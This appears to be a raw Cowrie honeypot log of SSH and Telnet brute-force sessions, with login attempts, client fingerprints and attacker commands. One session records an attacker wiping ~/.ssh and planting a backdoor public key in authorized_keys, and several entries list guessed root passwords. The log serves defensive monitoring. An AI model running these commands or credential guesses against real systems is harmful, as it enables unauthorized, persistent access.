{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:15:04.649598Z","src_ip":"213.209.150.239","session":"04a21e6e1aa8"}
{"eventid":"cowrie.session.connect","src_ip":"45.88.8.215","src_port":52684,"dst_ip":"1.2.3.4","dst_port":22,"session":"3dda9efa4779","protocol":"ssh","message":"New connection: 45.88.8.215:52684 (1.2.3.4:22) [session: 3dda9efa4779]","sensor":"my-vps","timestamp":"2025-08-26T14:15:10.411937Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T14:15:10.833929Z","src_ip":"45.88.8.215","session":"3dda9efa4779"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T14:15:10.835641Z","src_ip":"45.88.8.215","session":"3dda9efa4779"}
{"eventid":"cowrie.login.success","username":"root","password":"Mukul@123","message":"login attempt [root/Mukul@123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T14:15:11.698401Z","src_ip":"45.88.8.215","session":"3dda9efa4779"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:15:11.852574Z","src_ip":"45.88.8.215","session":"3dda9efa4779"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58674,"dst_ip":"1.2.3.4","dst_port":22,"session":"29ab8035059c","protocol":"ssh","message":"New connection: 212.227.235.229:58674 (1.2.3.4:22) [session: 29ab8035059c]","sensor":"my-vps","timestamp":"2025-08-26T14:15:16.885418Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T14:15:16.886307Z","src_ip":"212.227.235.229","session":"29ab8035059c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T14:15:17.120377Z","src_ip":"212.227.235.229","session":"29ab8035059c"}
{"eventid":"cowrie.login.success","username":"root","password":"Huawei@321","message":"login attempt [root/Huawei@321] succeeded","sensor":"my-vps","timestamp":"2025-08-26T14:15:18.881208Z","src_ip":"212.227.235.229","session":"29ab8035059c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T14:15:19.407644Z","src_ip":"212.227.235.229","session":"29ab8035059c"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T14:15:19.408410Z","src_ip":"212.227.235.229","session":"29ab8035059c"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T14:15:19.409414Z","src_ip":"212.227.235.229","session":"29ab8035059c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:15:19.644134Z","src_ip":"212.227.235.229","session":"29ab8035059c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T14:15:20.131126Z","src_ip":"212.227.235.229","session":"29ab8035059c"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T14:15:20.131824Z","src_ip":"212.227.235.229","session":"29ab8035059c"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T14:15:20.368990Z","src_ip":"212.227.235.229","session":"29ab8035059c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:15:20.370105Z","src_ip":"212.227.235.229","session":"29ab8035059c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58686,"dst_ip":"1.2.3.4","dst_port":22,"session":"4e80fc1dbda4","protocol":"ssh","message":"New connection: 212.227.235.229:58686 (1.2.3.4:22) [session: 4e80fc1dbda4]","sensor":"my-vps","timestamp":"2025-08-26T14:15:20.605817Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T14:15:20.606931Z","src_ip":"212.227.235.229","session":"4e80fc1dbda4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T14:15:20.849316Z","src_ip":"212.227.235.229","session":"4e80fc1dbda4"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T14:15:21.856085Z","src_ip":"212.227.235.229","session":"4e80fc1dbda4"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:15:23.104079Z","src_ip":"212.227.235.229","session":"4e80fc1dbda4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60860,"dst_ip":"1.2.3.4","dst_port":22,"session":"b15c5b91c499","protocol":"ssh","message":"New connection: 212.227.235.229:60860 (1.2.3.4:22) [session: b15c5b91c499]","sensor":"my-vps","timestamp":"2025-08-26T14:15:23.359265Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T14:15:23.359946Z","src_ip":"212.227.235.229","session":"b15c5b91c499"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T14:15:23.609537Z","src_ip":"212.227.235.229","session":"b15c5b91c499"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T14:15:24.657573Z","src_ip":"212.227.235.229","session":"b15c5b91c499"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:15:24.908611Z","src_ip":"212.227.235.229","session":"29ab8035059c"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:15:24.909743Z","src_ip":"212.227.235.229","session":"b15c5b91c499"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37778,"dst_ip":"1.2.3.4","dst_port":23,"session":"70e385a222bd","protocol":"telnet","message":"New connection: 212.227.125.160:37778 (1.2.3.4:23) [session: 70e385a222bd]","sensor":"my-vps","timestamp":"2025-08-26T14:16:06.117545Z"}
{"eventid":"cowrie.session.connect","src_ip":"61.160.119.124","src_port":48616,"dst_ip":"1.2.3.4","dst_port":22,"session":"bd50e70863fb","protocol":"ssh","message":"New connection: 61.160.119.124:48616 (1.2.3.4:22) [session: bd50e70863fb]","sensor":"my-vps","timestamp":"2025-08-26T14:16:28.949950Z"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:16:29.133301Z","src_ip":"61.160.119.124","session":"bd50e70863fb"}
{"eventid":"cowrie.session.connect","src_ip":"61.160.119.124","src_port":49280,"dst_ip":"1.2.3.4","dst_port":22,"session":"7e6cb893db01","protocol":"ssh","message":"New connection: 61.160.119.124:49280 (1.2.3.4:22) [session: 7e6cb893db01]","sensor":"my-vps","timestamp":"2025-08-26T14:16:29.348980Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T14:16:29.349884Z","src_ip":"61.160.119.124","session":"7e6cb893db01"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T14:16:29.551389Z","src_ip":"61.160.119.124","session":"7e6cb893db01"}
{"eventid":"cowrie.login.failed","username":"root","password":"root","message":"login attempt [root/root] failed","sensor":"my-vps","timestamp":"2025-08-26T14:16:30.166653Z","src_ip":"61.160.119.124","session":"7e6cb893db01"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:16:31.371232Z","src_ip":"61.160.119.124","session":"7e6cb893db01"}
{"eventid":"cowrie.session.connect","src_ip":"61.160.119.124","src_port":50550,"dst_ip":"1.2.3.4","dst_port":22,"session":"bab7ce103400","protocol":"ssh","message":"New connection: 61.160.119.124:50550 (1.2.3.4:22) [session: bab7ce103400]","sensor":"my-vps","timestamp":"2025-08-26T14:16:31.556614Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T14:16:31.557468Z","src_ip":"61.160.119.124","session":"bab7ce103400"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T14:16:31.754995Z","src_ip":"61.160.119.124","session":"bab7ce103400"}
{"eventid":"cowrie.login.failed","username":"root","password":"123456","message":"login attempt [root/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T14:16:32.354332Z","src_ip":"61.160.119.124","session":"bab7ce103400"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:16:33.548831Z","src_ip":"61.160.119.124","session":"bab7ce103400"}
{"eventid":"cowrie.session.connect","src_ip":"61.160.119.124","src_port":51952,"dst_ip":"1.2.3.4","dst_port":22,"session":"2b7d63c94c01","protocol":"ssh","message":"New connection: 61.160.119.124:51952 (1.2.3.4:22) [session: 2b7d63c94c01]","sensor":"my-vps","timestamp":"2025-08-26T14:16:33.771392Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T14:16:33.772833Z","src_ip":"61.160.119.124","session":"2b7d63c94c01"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T14:16:33.984817Z","src_ip":"61.160.119.124","session":"2b7d63c94c01"}
{"eventid":"cowrie.login.success","username":"root","password":"123","message":"login attempt [root/123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T14:16:34.840786Z","src_ip":"61.160.119.124","session":"2b7d63c94c01"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T14:16:35.317051Z","src_ip":"61.160.119.124","session":"2b7d63c94c01"}
{"eventid":"cowrie.command.input","input":"uname -s -m","message":"CMD: uname -s -m","sensor":"my-vps","timestamp":"2025-08-26T14:16:35.317761Z","src_ip":"61.160.119.124","session":"2b7d63c94c01"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/6fa4c8ac58e7a1d947dc3250c39d1e27958f012e68061d8de0a7b70e3a65b906","size":13,"shasum":"6fa4c8ac58e7a1d947dc3250c39d1e27958f012e68061d8de0a7b70e3a65b906","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/6fa4c8ac58e7a1d947dc3250c39d1e27958f012e68061d8de0a7b70e3a65b906 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:16:35.533226Z","src_ip":"61.160.119.124","session":"2b7d63c94c01"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:16:35.534300Z","src_ip":"61.160.119.124","session":"2b7d63c94c01"}
{"eventid":"cowrie.session.closed","duration":30.500583171844482,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:16:36.618055Z","src_ip":"212.227.125.160","session":"70e385a222bd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59424,"dst_ip":"1.2.3.4","dst_port":22,"session":"bfea22fd9f82","protocol":"ssh","message":"New connection: 212.227.235.229:59424 (1.2.3.4:22) [session: bfea22fd9f82]","sensor":"my-vps","timestamp":"2025-08-26T14:16:46.816333Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T14:16:46.817250Z","src_ip":"212.227.235.229","session":"bfea22fd9f82"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T14:16:47.056983Z","src_ip":"212.227.235.229","session":"bfea22fd9f82"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":50266,"dst_ip":"1.2.3.4","dst_port":22,"session":"d8769202ca1d","protocol":"ssh","message":"New connection: 217.72.205.35:50266 (1.2.3.4:22) [session: d8769202ca1d]","sensor":"my-vps","timestamp":"2025-08-26T14:16:47.088187Z"}
